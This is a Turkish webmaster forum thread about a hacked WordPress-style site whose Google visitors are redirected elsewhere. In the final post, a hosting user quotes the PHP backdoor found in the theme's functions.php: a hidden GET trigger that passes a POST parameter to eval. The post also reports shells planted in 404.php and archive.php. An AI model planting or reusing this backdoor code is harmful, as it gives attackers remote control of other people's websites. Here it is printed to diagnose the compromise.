lostyazilim

Forum saldırıya uğramış

11 Mesajlar 1.871 Okunma
lstbozum
wmaraci reklam

aspercasper aspercasper WM Aracı Kullanıcı
  • Üyelik 04.07.2013
  • Yaş/Cinsiyet 44 / E
  • Meslek Düşünür
  • Konum Ankara
  • Ad Soyad M** I**
  • Mesajlar 260
  • Beğeniler 20 / 37
  • Ticaret 2, (%100)
Arkadaşlar sitemi googla da arattım çıkan sonuçlaardan sitemi seçtiğimde başka bir siteye bağlanıyor. Sitemin altında aramalarda site saldırıya uğramış olabilir diye uyarı çıkıyor bu sorunu nasıl düzeltebilirim?

 

 

İmzam Yok.
wmaraci
reklam

izmirweb35 izmirweb35 WM Aracı Kullanıcı
  • Üyelik 13.03.2015
  • Yaş/Cinsiyet 31 / E
  • Meslek PHP Developer , IT Uzmanı
  • Konum İzmir
  • Ad Soyad H** E**
  • Mesajlar 116
  • Beğeniler 3 / 10
  • Ticaret 1, (%0)
Domainizi ve kelimeyi PM Atarsanız bir inceleyim hocam.
 

 

aspercasper aspercasper WM Aracı Kullanıcı
  • Üyelik 04.07.2013
  • Yaş/Cinsiyet 44 / E
  • Meslek Düşünür
  • Konum Ankara
  • Ad Soyad M** I**
  • Mesajlar 260
  • Beğeniler 20 / 37
  • Ticaret 2, (%100)
pm gönderdim ilginiz için teşekkür ederim
 

 

İmzam Yok.

izmirweb35 izmirweb35 WM Aracı Kullanıcı
  • Üyelik 13.03.2015
  • Yaş/Cinsiyet 31 / E
  • Meslek PHP Developer , IT Uzmanı
  • Konum İzmir
  • Ad Soyad H** E**
  • Mesajlar 116
  • Beğeniler 3 / 10
  • Ticaret 1, (%0)

aspercasper adlı üyeden alıntı

pm gönderdim ilginiz için teşekkür ederim


gelmedi PM
 

 

wmaraci
wmaraci

aspercasper aspercasper WM Aracı Kullanıcı
  • Üyelik 04.07.2013
  • Yaş/Cinsiyet 44 / E
  • Meslek Düşünür
  • Konum Ankara
  • Ad Soyad M** I**
  • Mesajlar 260
  • Beğeniler 20 / 37
  • Ticaret 2, (%100)


özel mesaj kutusu dolmuş hocam şimdi tekrar gönderdim.
 

 

İmzam Yok.

selomany selomany WM Aracı Kullanıcı
  • Üyelik 24.08.2014
  • Yaş/Cinsiyet 33 / E
  • Meslek Front-end Developer
  • Konum İstanbul Avrupa
  • Ad Soyad S** G**
  • Mesajlar 95
  • Beğeniler 13 / 31
  • Ticaret 0, (%0)
Google webmaster tools'a siteni ekle. Sana adım adım anlatacak nasıl ekleneceğini. Ftp'ye dosya atacaksın google verecek bu dosyayı. Siteni doğruladıktan sonra sorun nerede google gösterecek adresi sana. Geçenlerde başıma geldi, back.asp diye bir dosyada sıkıntı varmış. Sorunu çözüp google'a bildirdim 2 gün içerisinde düzeldi.
 

 

aspercasper aspercasper WM Aracı Kullanıcı
  • Üyelik 04.07.2013
  • Yaş/Cinsiyet 44 / E
  • Meslek Düşünür
  • Konum Ankara
  • Ad Soyad M** I**
  • Mesajlar 260
  • Beğeniler 20 / 37
  • Ticaret 2, (%100)

selomany adlı üyeden alıntı

Google webmaster tools'a siteni ekle. Sana adım adım anlatacak nasıl ekleneceğini. Ftp'ye dosya atacaksın google verecek bu dosyayı. Siteni doğruladıktan sonra sorun nerede google gösterecek adresi sana. Geçenlerde başıma geldi, back.asp diye bir dosyada sıkıntı varmış. Sorunu çözüp google'a bildirdim 2 gün içerisinde düzeldi.


site ekliydi webmaster tools a yeniden mi eklemem gerekiyor*
 

 

İmzam Yok.

selomany selomany WM Aracı Kullanıcı
  • Üyelik 24.08.2014
  • Yaş/Cinsiyet 33 / E
  • Meslek Front-end Developer
  • Konum İstanbul Avrupa
  • Ad Soyad S** G**
  • Mesajlar 95
  • Beğeniler 13 / 31
  • Ticaret 0, (%0)
Hayır ekli ise giriş yaparak görebilirsiniz.
 

 

aspercasper aspercasper WM Aracı Kullanıcı
  • Üyelik 04.07.2013
  • Yaş/Cinsiyet 44 / E
  • Meslek Düşünür
  • Konum Ankara
  • Ad Soyad M** I**
  • Mesajlar 260
  • Beğeniler 20 / 37
  • Ticaret 2, (%100)
sorgulamayı nereden yapıyoruz girdim ama bulamadım. Sadece bir hata veriyor google bot sitenize erişemiyor diye başka da birşey yok
 

 

İmzam Yok.

centoshost centoshost WM Aracı Kullanıcı
  • Üyelik 14.03.2012
  • Yaş/Cinsiyet - / E
  • Meslek web hosting
  • Konum
  • Ad Soyad ** **
  • Mesajlar 1
  • Beğeniler 0 / 0
  • Ticaret 0, (%0)
Arkadaşlar bilen de konuşuyor bilmeyende sorunu ben size detaylı anlatacağım. Konuyu açan kişi benim arkadaşımdır. Sitesini girip incelediğimde şu sorunlara ulaştım.

Eğer sitenize direk erişim yapılıyor, ama googleden aratıldığında girilemiyorsa siteniz hack yemiş ve yönlendirme koduyla yönlendirilmiş demektir.

Yani arkadaşın sitesine direk erişim var ama googleden gelenlere başka bir siteye yönlendirme yapılmış.

Bu yönlendirmeler nasıl yapılır?
1. Yöntem Htacess - kontrol ettim oraya dokunulmamıştır.
2. Yöntem index.php ona da dokunulmamıştır.
3. Yöntem tema dosyaları - Hackleyen kişi tema dosyalarına aşağıdaki kodları girmiş.
31.ocak.2015 tarihinde temadaki aşağıdaki dosyalar değişikliğe uğramış.
404.php içine shell basılmış.
archive.php buna da shell basılmıs.
30.ocak2015 tarihinde functions php ye aşağıdaki kod eklenmiş.
function _g3t($str){
$val = !empty($_GET[$str]) ? $_GET[$str] : null;
return $val;
}
if(_g3t('eeK')=='f')
{
@eval($_POST['NWZAF']);
exit;
}
if(_g3t('eeK')=='c')
{
echo 'AcJ9ksbVjsdb';
exit;
}
//dsd6sc378axvg
?>

Tahminim adamlar güzel bi if else döngüsü kurarak siteyi site sahibi anlamadan yönlendirme yaparak piç etmişler.

Saçma sapan alakasız mesajlarla yardımcı olayım derken kimsenin kafasını bulandırmayınız.
Yok efendim Sunucu IP si spam olmuş bilmemne tüm siteler spama düşecekmiş falan filan.
 

 

wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)